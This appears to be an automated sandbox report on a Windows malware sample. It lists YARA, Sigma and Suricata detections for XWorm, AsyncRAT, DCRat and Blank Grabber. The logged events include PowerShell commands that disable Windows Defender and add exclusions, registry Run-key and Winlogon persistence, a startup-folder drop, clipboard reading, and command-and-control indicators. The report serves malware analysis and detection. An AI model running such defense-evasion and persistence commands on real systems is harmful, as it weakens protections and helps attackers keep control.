00000039.00000002.2145328378.0000000002848000.00000004.00000800.00020000.00000000.sdmp	JoeSecurity_DCRat_1	Yara detected DCRat	Joe Security
00000034.00000002.2132843674.00000000023C1000.00000004.00000800.00020000.00000000.sdmp	JoeSecurity_DCRat_1	Yara detected DCRat	Joe Security
00000003.00000003.2032955728.000001D5E542F000.00000004.00000020.00020000.00000000.sdmp	JoeSecurity_BlankGrabber	Yara detected Blank Grabber	Joe Security
00000026.00000002.1871672428.00000000032F1000.00000004.00000800.00020000.00000000.sdmp	JoeSecurity_DCRat_1	Yara detected DCRat	Joe Security
Process Memory Space: Vjy8d2EoqK.exe PID: 2596	JoeSecurity_XWorm	Yara detected XWorm	Joe Security
Process Memory Space: Built.exe PID: 6496	JoeSecurity_BlankGrabber	Yara detected Blank Grabber	Joe Security
Process Memory Space: Built.exe PID: 6252	JoeSecurity_BlankGrabber	Yara detected Blank Grabber	Joe Security
Process Memory Space: Built.exe PID: 6252	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
Process Memory Space: Built.exe PID: 6252	JoeSecurity_TelegramRAT	Yara detected Telegram RAT	Joe Security
Process Memory Space: S l r .exe PID: 5768	JoeSecurity_XWorm	Yara detected XWorm	Joe Security
Process Memory Space: XClient.exe PID: 7216	JoeSecurity_XWorm	Yara detected XWorm	Joe Security
Process Memory Space: comReviewsession.exe PID: 7476	JoeSecurity_DCRat_1	Yara detected DCRat	Joe Security
Process Memory Space: dasHost.exe PID: 7324	JoeSecurity_DCRat_1	Yara detected DCRat	Joe Security
Process Memory Space: dasHost.exe PID: 8064	JoeSecurity_DCRat_1	Yara detected DCRat	Joe Security
Process Memory Space: dwm.exe PID: 8060	JoeSecurity_DCRat_1	Yara detected DCRat	Joe Security
Process Memory Space: iKSiRODBDWoPAMSDKBDQBFN.exe PID: 7568	JoeSecurity_DCRat_1	Yara detected DCRat	Joe Security
Process Memory Space: iKSiRODBDWoPAMSDKBDQBFN.exe PID: 7776	JoeSecurity_DCRat_1	Yara detected DCRat	Joe Security
Click to see the 43 entries

Unpacked PEs

Source	Rule	Description	Author	Strings
4.0.S l r .exe.409294.1.unpack	JoeSecurity_XWorm	Yara detected XWorm	Joe Security
4.0.S l r .exe.409294.1.unpack	MALWARE_Win_AsyncRAT	Detects AsyncRAT	ditekSHen	0x9dca:$cnc1: Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:66.0) Gecko/20100101 Firefox/66.0 0x9e67:$cnc2: Mozilla/5.0 (iPhone; CPU iPhone OS 11_4_1 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/11.0 Mobile/15E148 Safari/604.1 0x9f7c:$cnc3: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/60.0.3112.113 Safari/537.36 0x9718:$cnc4: POST / HTTP/1.1
4.3.S l r .exe.569e78.0.unpack	JoeSecurity_XWorm	Yara detected XWorm	Joe Security
4.3.S l r .exe.569e78.0.unpack	MALWARE_Win_AsyncRAT	Detects AsyncRAT	ditekSHen	0x9dca:$cnc1: Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:66.0) Gecko/20100101 Firefox/66.0 0x9e67:$cnc2: Mozilla/5.0 (iPhone; CPU iPhone OS 11_4_1 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/11.0 Mobile/15E148 Safari/604.1 0x9f7c:$cnc3: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/60.0.3112.113 Safari/537.36 0x9718:$cnc4: POST / HTTP/1.1
0.3.Vjy8d2EoqK.exe.e954a4.1.unpack	JoeSecurity_XWorm	Yara detected XWorm	Joe Security
0.3.Vjy8d2EoqK.exe.e954a4.1.unpack	MALWARE_Win_AsyncRAT	Detects AsyncRAT	ditekSHen	0x9dca:$cnc1: Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:66.0) Gecko/20100101 Firefox/66.0 0x9e67:$cnc2: Mozilla/5.0 (iPhone; CPU iPhone OS 11_4_1 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/11.0 Mobile/15E148 Safari/604.1 0x9f7c:$cnc3: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/60.0.3112.113 Safari/537.36 0x9718:$cnc4: POST / HTTP/1.1
4.0.S l r .exe.409294.1.raw.unpack	JoeSecurity_XWorm	Yara detected XWorm	Joe Security
4.0.S l r .exe.409294.1.raw.unpack	JoeSecurity_GenericDownloader_1	Yara detected Generic Downloader	Joe Security
4.0.S l r .exe.409294.1.raw.unpack	MALWARE_Win_AsyncRAT	Detects AsyncRAT	ditekSHen	0xbbca:$cnc1: Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:66.0) Gecko/20100101 Firefox/66.0 0xbc67:$cnc2: Mozilla/5.0 (iPhone; CPU iPhone OS 11_4_1 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/11.0 Mobile/15E148 Safari/604.1 0xbd7c:$cnc3: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/60.0.3112.113 Safari/537.36 0xb518:$cnc4: POST / HTTP/1.1
4.3.S l r .exe.569e78.0.raw.unpack	JoeSecurity_XWorm	Yara detected XWorm	Joe Security
4.3.S l r .exe.569e78.0.raw.unpack	MALWARE_Win_AsyncRAT	Detects AsyncRAT	ditekSHen	0xbbca:$cnc1: Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:66.0) Gecko/20100101 Firefox/66.0 0xbc67:$cnc2: Mozilla/5.0 (iPhone; CPU iPhone OS 11_4_1 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/11.0 Mobile/15E148 Safari/604.1 0xbd7c:$cnc3: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/60.0.3112.113 Safari/537.36 0xb518:$cnc4: POST / HTTP/1.1
6.0.XClient.exe.d70000.0.unpack	JoeSecurity_XWorm	Yara detected XWorm	Joe Security
6.0.XClient.exe.d70000.0.unpack	MALWARE_Win_AsyncRAT	Detects AsyncRAT	ditekSHen	0xbbca:$cnc1: Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:66.0) Gecko/20100101 Firefox/66.0 0xbc67:$cnc2: Mozilla/5.0 (iPhone; CPU iPhone OS 11_4_1 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/11.0 Mobile/15E148 Safari/604.1 0xbd7c:$cnc3: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/60.0.3112.113 Safari/537.36 0xb518:$cnc4: POST / HTTP/1.1
0.3.Vjy8d2EoqK.exe.e8248c.3.raw.unpack	JoeSecurity_XWorm	Yara detected XWorm	Joe Security
0.3.Vjy8d2EoqK.exe.e8248c.3.raw.unpack	JoeSecurity_GenericDownloader_1	Yara detected Generic Downloader	Joe Security
0.3.Vjy8d2EoqK.exe.e8248c.3.raw.unpack	MALWARE_Win_AsyncRAT	Detects AsyncRAT	ditekSHen	0xbbca:$cnc1: Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:66.0) Gecko/20100101 Firefox/66.0 0x1ebe2:$cnc1: Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:66.0) Gecko/20100101 Firefox/66.0 0xbc67:$cnc2: Mozilla/5.0 (iPhone; CPU iPhone OS 11_4_1 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/11.0 Mobile/15E148 Safari/604.1 0x1ec7f:$cnc2: Mozilla/5.0 (iPhone; CPU iPhone OS 11_4_1 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/11.0 Mobile/15E148 Safari/604.1 0xbd7c:$cnc3: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/60.0.3112.113 Safari/537.36 0x1ed94:$cnc3: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/60.0.3112.113 Safari/537.36 0xb518:$cnc4: POST / HTTP/1.1 0x1e530:$cnc4: POST / HTTP/1.1
0.3.Vjy8d2EoqK.exe.e954a4.1.raw.unpack	JoeSecurity_XWorm	Yara detected XWorm	Joe Security
0.3.Vjy8d2EoqK.exe.e954a4.1.raw.unpack	JoeSecurity_GenericDownloader_1	Yara detected Generic Downloader	Joe Security
0.3.Vjy8d2EoqK.exe.e954a4.1.raw.unpack	MALWARE_Win_AsyncRAT	Detects AsyncRAT	ditekSHen	0xbbca:$cnc1: Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:66.0) Gecko/20100101 Firefox/66.0 0xbc67:$cnc2: Mozilla/5.0 (iPhone; CPU iPhone OS 11_4_1 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/11.0 Mobile/15E148 Safari/604.1 0xbd7c:$cnc3: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/60.0.3112.113 Safari/537.36 0xb518:$cnc4: POST / HTTP/1.1
0.3.Vjy8d2EoqK.exe.e8fa8c.2.raw.unpack	JoeSecurity_XWorm	Yara detected XWorm	Joe Security
0.3.Vjy8d2EoqK.exe.e8fa8c.2.raw.unpack	JoeSecurity_GenericDownloader_1	Yara detected Generic Downloader	Joe Security
0.3.Vjy8d2EoqK.exe.e8fa8c.2.raw.unpack	MALWARE_Win_AsyncRAT	Detects AsyncRAT	ditekSHen	0x115e2:$cnc1: Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:66.0) Gecko/20100101 Firefox/66.0 0x1167f:$cnc2: Mozilla/5.0 (iPhone; CPU iPhone OS 11_4_1 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/11.0 Mobile/15E148 Safari/604.1 0x11794:$cnc3: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/60.0.3112.113 Safari/537.36 0x10f30:$cnc4: POST / HTTP/1.1
0.3.Vjy8d2EoqK.exe.e8248c.3.unpack	JoeSecurity_XWorm	Yara detected XWorm	Joe Security
0.3.Vjy8d2EoqK.exe.e8248c.3.unpack	MALWARE_Win_AsyncRAT	Detects AsyncRAT	ditekSHen	0x9dca:$cnc1: Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:66.0) Gecko/20100101 Firefox/66.0 0x9e67:$cnc2: Mozilla/5.0 (iPhone; CPU iPhone OS 11_4_1 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/11.0 Mobile/15E148 Safari/604.1 0x9f7c:$cnc3: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/60.0.3112.113 Safari/537.36 0x9718:$cnc4: POST / HTTP/1.1
0.0.Vjy8d2EoqK.exe.b2d3b7.2.raw.unpack	JoeSecurity_XWorm	Yara detected XWorm	Joe Security
0.0.Vjy8d2EoqK.exe.b2d3b7.2.raw.unpack	JoeSecurity_GenericDownloader_1	Yara detected Generic Downloader	Joe Security
0.0.Vjy8d2EoqK.exe.b2d3b7.2.raw.unpack	MALWARE_Win_AsyncRAT	Detects AsyncRAT	ditekSHen	0xdcfc7:$cnc1: Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:66.0) Gecko/20100101 Firefox/66.0 0xdd064:$cnc2: Mozilla/5.0 (iPhone; CPU iPhone OS 11_4_1 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/11.0 Mobile/15E148 Safari/604.1 0xdd179:$cnc3: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/60.0.3112.113 Safari/537.36 0xdc915:$cnc4: POST / HTTP/1.1
4.0.S l r .exe.400000.0.unpack	JoeSecurity_XWorm	Yara detected XWorm	Joe Security
4.0.S l r .exe.400000.0.unpack	MALWARE_Win_AsyncRAT	Detects AsyncRAT	ditekSHen	0xe05e:$cnc1: Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:66.0) Gecko/20100101 Firefox/66.0 0xe0fb:$cnc2: Mozilla/5.0 (iPhone; CPU iPhone OS 11_4_1 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/11.0 Mobile/15E148 Safari/604.1 0xe210:$cnc3: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/60.0.3112.113 Safari/537.36 0xd9ac:$cnc4: POST / HTTP/1.1
0.0.Vjy8d2EoqK.exe.adfe9c.3.raw.unpack	JoeSecurity_XWorm	Yara detected XWorm	Joe Security
0.0.Vjy8d2EoqK.exe.adfe9c.3.raw.unpack	MALWARE_Win_AsyncRAT	Detects AsyncRAT	ditekSHen	0x12a4e2:$cnc1: Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:66.0) Gecko/20100101 Firefox/66.0 0x12a57f:$cnc2: Mozilla/5.0 (iPhone; CPU iPhone OS 11_4_1 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/11.0 Mobile/15E148 Safari/604.1 0x12a694:$cnc3: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/60.0.3112.113 Safari/537.36 0x129e30:$cnc4: POST / HTTP/1.1
0.0.Vjy8d2EoqK.exe.400000.0.unpack	JoeSecurity_XWorm	Yara detected XWorm	Joe Security
0.0.Vjy8d2EoqK.exe.400000.0.unpack	MALWARE_Win_AsyncRAT	Detects AsyncRAT	ditekSHen	0x80357e:$cnc1: Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:66.0) Gecko/20100101 Firefox/66.0 0x80361b:$cnc2: Mozilla/5.0 (iPhone; CPU iPhone OS 11_4_1 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/11.0 Mobile/15E148 Safari/604.1 0x803730:$cnc3: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/60.0.3112.113 Safari/537.36 0x802ecc:$cnc4: POST / HTTP/1.1
0.0.Vjy8d2EoqK.exe.40936c.1.raw.unpack	JoeSecurity_XWorm	Yara detected XWorm	Joe Security
0.0.Vjy8d2EoqK.exe.40936c.1.raw.unpack	MALWARE_Win_AsyncRAT	Detects AsyncRAT	ditekSHen	0x801012:$cnc1: Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:66.0) Gecko/20100101 Firefox/66.0 0x8010af:$cnc2: Mozilla/5.0 (iPhone; CPU iPhone OS 11_4_1 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/11.0 Mobile/15E148 Safari/604.1 0x8011c4:$cnc3: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/60.0.3112.113 Safari/537.36 0x800960:$cnc4: POST / HTTP/1.1
Click to see the 30 entries

Sigma Signatures

System Summary

Sigma detected: Files With System Process Name In Unsuspected Locations

Source: File created

Author: Sander Wiebing, Tim Shelton, Nasreddine Bencherchali (Nextron Systems): Data: EventID: 11, Image: C:\Brokercrt\comReviewsession.exe, ProcessId: 7476, TargetFilename: C:\Windows\SysWOW64\it-IT\dasHost.exe

Sigma detected: New RUN Key Pointing to Suspicious Folder

Source: Registry Key set

Author: Florian Roth (Nextron Systems), Markus Neis, Sander Wiebing: Data: Details: "C:\Users\Default\Templates\iKSiRODBDWoPAMSDKBDQBFN.exe", EventID: 13, EventType: SetValue, Image: C:\Brokercrt\comReviewsession.exe, ProcessId: 7476, TargetObject: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\iKSiRODBDWoPAMSDKBDQBFN

Sigma detected: Powershell Base64 Encoded MpPreference Cmdlet

Source: Process started

Author: Florian Roth (Nextron Systems): Data: Command: C:\Windows\system32\cmd.exe /c "powershell -Command Add-MpPreference -ExclusionPath 'C:\Users\user\AppData\Local\Temp\Built.exe'", CommandLine: C:\Windows\system32\cmd.exe /c "powershell -Command Add-MpPreference -ExclusionPath 'C:\Users\user\AppData\Local\Temp\Built.exe'", CommandLine|base64offset|contains: , Image: C:\Windows\System32\cmd.exe, NewProcessName: C:\Windows\System32\cmd.exe, OriginalFileName: C:\Windows\System32\cmd.exe, ParentCommandLine: "C:\Users\user\AppData\Local\Temp\Built.exe" , ParentImage: C:\Users\user\AppData\Local\Temp\Built.exe, ParentProcessId: 6252, ParentProcessName: Built.exe, ProcessCommandLine: C:\Windows\system32\cmd.exe /c "powershell -Command Add-MpPreference -ExclusionPath 'C:\Users\user\AppData\Local\Temp\Built.exe'", ProcessId: 7372, ProcessName: cmd.exe

Sigma detected: Powershell Defender Disable Scan Feature

Source: Process started

Author: Florian Roth (Nextron Systems): Data: Command: C:\Windows\system32\cmd.exe /c "powershell Set-MpPreference -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableRealtimeMonitoring $true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled -SubmitSamplesConsent NeverSend && powershell Set-MpPreference -SubmitSamplesConsent 2 & "%ProgramFiles%\Windows Defender\MpCmdRun.exe" -RemoveDefinitions -All", CommandLine: C:\Windows\system32\cmd.exe /c "powershell Set-MpPreference -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableRealtimeMonitoring $true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled -SubmitSamplesConsent NeverSend && powershell Set-MpPreference -SubmitSamplesConsent 2 & "%ProgramFiles%\Windows Defender\MpCmdRun.exe" -RemoveDefinitions -All", CommandLine|base64offset|contains: , Image: C:\Windows\System32\cmd.exe, NewProcessName: C:\Windows\System32\cmd.exe, OriginalFileName: C:\Windows\System32\cmd.exe, ParentCommandLine: "C:\Users\user\AppData\Local\Temp\Built.exe" , ParentImage: C:\Users\user\AppData\Local\Temp\Built.exe, ParentProcessId: 6252, ParentProcessName: Built.exe, ProcessCommandLine: C:\Windows\system32\cmd.exe /c "powershell Set-MpPreference -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableRealtimeMonitoring $true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled -SubmitSamplesConsent NeverSend && powershell Set-MpPreference -SubmitSamplesConsent 2 & "%ProgramFiles%\Windows Defender\MpCmdRun.exe" -RemoveDefinitions -All", ProcessId: 7380, ProcessName: cmd.exe

Sigma detected: Script Interpreter Execution From Suspicious Folder

Source: Process started

Author: Florian Roth (Nextron Systems), Nasreddine Bencherchali (Nextron Systems): Data: Command: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\user\AppData\Local\Temp\XClient.exe', CommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\user\AppData\Local\Temp\XClient.exe', CommandLine|base64offset|contains: L^rbs'2, Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: "C:\Users\user\AppData\Local\Temp\XClient.exe" , ParentImage: C:\Users\user\AppData\Local\Temp\XClient.exe, ParentProcessId: 7216, ParentProcessName: XClient.exe, ProcessCommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\user\AppData\Local\Temp\XClient.exe', ProcessId: 7848, ProcessName: powershell.exe

Sigma detected: Suspicious Script Execution From Temp Folder

Source: Process started

Author: Florian Roth (Nextron Systems), Max Altgelt (Nextron Systems), Tim Shelton: Data: Command: powershell -Command Add-MpPreference -ExclusionPath 'C:\Users\user\AppData\Local\Temp\Built.exe', CommandLine: powershell -Command Add-MpPreference -ExclusionPath 'C:\Users\user\AppData\Local\Temp\Built.exe', CommandLine|base64offset|contains: ^, Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: C:\Windows\system32\cmd.exe /c "powershell -Command Add-MpPreference -ExclusionPath 'C:\Users\user\AppData\Local\Temp\Built.exe'", ParentImage: C:\Windows\System32\cmd.exe, ParentProcessId: 7372, ParentProcessName: cmd.exe, ProcessCommandLine: powershell -Command Add-MpPreference -ExclusionPath 'C:\Users\user\AppData\Local\Temp\Built.exe', ProcessId: 7564, ProcessName: powershell.exe

Sigma detected: Suspicious Startup Folder Persistence

Source: File created

Author: Nasreddine Bencherchali (Nextron Systems): Data: EventID: 11, Image: C:\Users\user\AppData\Local\Temp\Built.exe, ProcessId: 6252, TargetFilename: C:\ProgramData\Microsoft\Windows\Start Menu\Programs\StartUp\ ? .scr

Sigma detected: System File Execution Location Anomaly

Source: Process started

Author: Florian Roth (Nextron Systems), Patrick Bareiss, Anton Kutepov, oscd.community, Nasreddine Bencherchali: Data: Command: "C:\Program Files\Windows Security\BrowserCore\en-US\dwm.exe", CommandLine: "C:\Program Files\Windows Security\BrowserCore\en-US\dwm.exe", CommandLine|base64offset|contains: , Image: C:\Program Files\Windows Security\BrowserCore\en-US\dwm.exe, NewProcessName: C:\Program Files\Windows Security\BrowserCore\en-US\dwm.exe, OriginalFileName: C:\Program Files\Windows Security\BrowserCore\en-US\dwm.exe, ParentCommandLine: , ParentImage: , ParentProcessId: 1044, ProcessCommandLine: "C:\Program Files\Windows Security\BrowserCore\en-US\dwm.exe", ProcessId: 8060, ProcessName: dwm.exe

Sigma detected: Change PowerShell Policies to an Insecure Level

Source: Process started

Author: frack113: Data: Command: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\user\AppData\Local\Temp\XClient.exe', CommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\user\AppData\Local\Temp\XClient.exe', CommandLine|base64offset|contains: L^rbs'2, Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: "C:\Users\user\AppData\Local\Temp\XClient.exe" , ParentImage: C:\Users\user\AppData\Local\Temp\XClient.exe, ParentProcessId: 7216, ParentProcessName: XClient.exe, ProcessCommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\user\AppData\Local\Temp\XClient.exe', ProcessId: 7848, ProcessName: powershell.exe

Sigma detected: CurrentVersion Autorun Keys Modification

Source: Registry Key set

Author: Victor Sergeev, Daniil Yugoslavskiy, Gleb Sukhodolskiy, Timur Zinniatullin, oscd.community, Tim Shelton, frack113 (split): Data: Details: C:\Users\user\AppData\Roaming\XClient.exe, EventID: 13, EventType: SetValue, Image: C:\Users\user\AppData\Local\Temp\XClient.exe, ProcessId: 7216, TargetObject: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\XClient

Sigma detected: CurrentVersion NT Autorun Keys Modification

Source: Registry Key set

Author: Victor Sergeev, Daniil Yugoslavskiy, Gleb Sukhodolskiy, Timur Zinniatullin, oscd.community, Tim Shelton, frack113 (split): Data: Details: explorer.exe, "C:\Windows\SysWOW64\it-IT\dasHost.exe", EventID: 13, EventType: SetValue, Image: C:\Brokercrt\comReviewsession.exe, ProcessId: 7476, TargetObject: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\Shell

Sigma detected: PowerShell Get-Clipboard Cmdlet Via CLI

Source: Process started

Author: Nasreddine Bencherchali (Nextron Systems): Data: Command: C:\Windows\system32\cmd.exe /c "powershell Get-Clipboard", CommandLine: C:\Windows\system32\cmd.exe /c "powershell Get-Clipboard", CommandLine|base64offset|contains: , Image: C:\Windows\System32\cmd.exe, NewProcessName: C:\Windows\System32\cmd.exe, OriginalFileName: C:\Windows\System32\cmd.exe, ParentCommandLine: "C:\Users\user\AppData\Local\Temp\Built.exe" , ParentImage: C:\Users\user\AppData\Local\Temp\Built.exe, ParentProcessId: 6252, ParentProcessName: Built.exe, ProcessCommandLine: C:\Windows\system32\cmd.exe /c "powershell Get-Clipboard", ProcessId: 7768, ProcessName: cmd.exe

Sigma detected: Powershell Defender Exclusion

Source: Process started

Sigma detected: SCR File Write Event

Source: File created

Author: Christopher Peacock @securepeacock, SCYTHE @scythe_io: Data: EventID: 11, Image: C:\Users\user\AppData\Local\Temp\Built.exe, ProcessId: 6252, TargetFilename: C:\ProgramData\Microsoft\Windows\Start Menu\Programs\StartUp\ ? .scr

Sigma detected: Startup Folder File Write

Source: File created

Author: Roberto Rodriguez (Cyb3rWard0g), OTR (Open Threat Research): Data: EventID: 11, Image: C:\Users\user\AppData\Local\Temp\Built.exe, ProcessId: 6252, TargetFilename: C:\ProgramData\Microsoft\Windows\Start Menu\Programs\StartUp

Sigma detected: Suspicious Powershell In Registry Run Keys

Source: Registry Key set

Author: frack113, Florian Roth (Nextron Systems): Data: Details: "C:\Recovery\powershell.exe", EventID: 13, EventType: SetValue, Image: C:\Brokercrt\comReviewsession.exe, ProcessId: 7476, TargetObject: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\powershell

Sigma detected: Suspicious Screensaver Binary File Creation

Source: File created

Author: frack113: Data: EventID: 11, Image: C:\Users\user\AppData\Local\Temp\Built.exe, ProcessId: 6252, TargetFilename: C:\ProgramData\Microsoft\Windows\Start Menu\Programs\StartUp\ ? .scr

Sigma detected: WSF/JSE/JS/VBA/VBE File Execution Via Cscript/Wscript

Source: Process started

Author: Michael Haag: Data: Command: "C:\Windows\System32\WScript.exe" "C:\Brokercrt\aIVfHknoFLGNu6gLK6xZar0.vbe" , CommandLine: "C:\Windows\System32\WScript.exe" "C:\Brokercrt\aIVfHknoFLGNu6gLK6xZar0.vbe" , CommandLine|base64offset|contains: , Image: C:\Windows\SysWOW64\wscript.exe, NewProcessName: C:\Windows\SysWOW64\wscript.exe, OriginalFileName: C:\Windows\SysWOW64\wscript.exe, ParentCommandLine: "C:\Users\user\AppData\Local\Temp\svchosts.exe" , ParentImage: C:\Users\user\AppData\Local\Temp\svchosts.exe, ParentProcessId: 1436, ParentProcessName: svchosts.exe, ProcessCommandLine: "C:\Windows\System32\WScript.exe" "C:\Brokercrt\aIVfHknoFLGNu6gLK6xZar0.vbe" , ProcessId: 7200, ProcessName: wscript.exe

Sigma detected: Non Interactive PowerShell Process Spawned

Source: Process started

Author: Roberto Rodriguez @Cyb3rWard0g (rule), oscd.community (improvements): Data: Command: powershell Set-MpPreference -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableRealtimeMonitoring $true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled -SubmitSamplesConsent NeverSend, CommandLine: powershell Set-MpPreference -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableRealtimeMonitoring $true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled -SubmitSamplesConsent NeverSend, CommandLine|base64offset|contains: ^, Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: C:\Windows\system32\cmd.exe /c "powershell Set-MpPreference -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableRealtimeMonitoring $true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled -SubmitSamplesConsent NeverSend && powershell Set-MpPreference -SubmitSamplesConsent 2 & "%ProgramFiles%\Windows Defender\MpCmdRun.exe" -RemoveDefinitions -All", ParentImage: C:\Windows\System32\cmd.exe, ParentProcessId: 7380, ParentProcessName: cmd.exe, ProcessCommandLine: powershell Set-MpPreference -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableRealtimeMonitoring $true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled -SubmitSamplesConsent NeverSend, ProcessId: 7552, ProcessName: powershell.exe

Snort Signatures

Suricata Signatures

ET MALWARE DCRAT Activity (GET) - Source IP: 192.168.2.4 - Destination IP: 141.8.192.93

Timestamp:	2024-08-05T14:32:59.584377+0200
SID:	2034194
Source Port:	49747
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ETPRO MALWARE Common Downloader Header Pattern H - Source IP: 192.168.2.4 - Destination IP: 140.82.121.4

Timestamp:	2024-08-05T14:32:09.137117+0200
SID:	2803305
Source Port:	49733
Destination Port:	443
Protocol:	TCP
Classtype:	Unknown Traffic

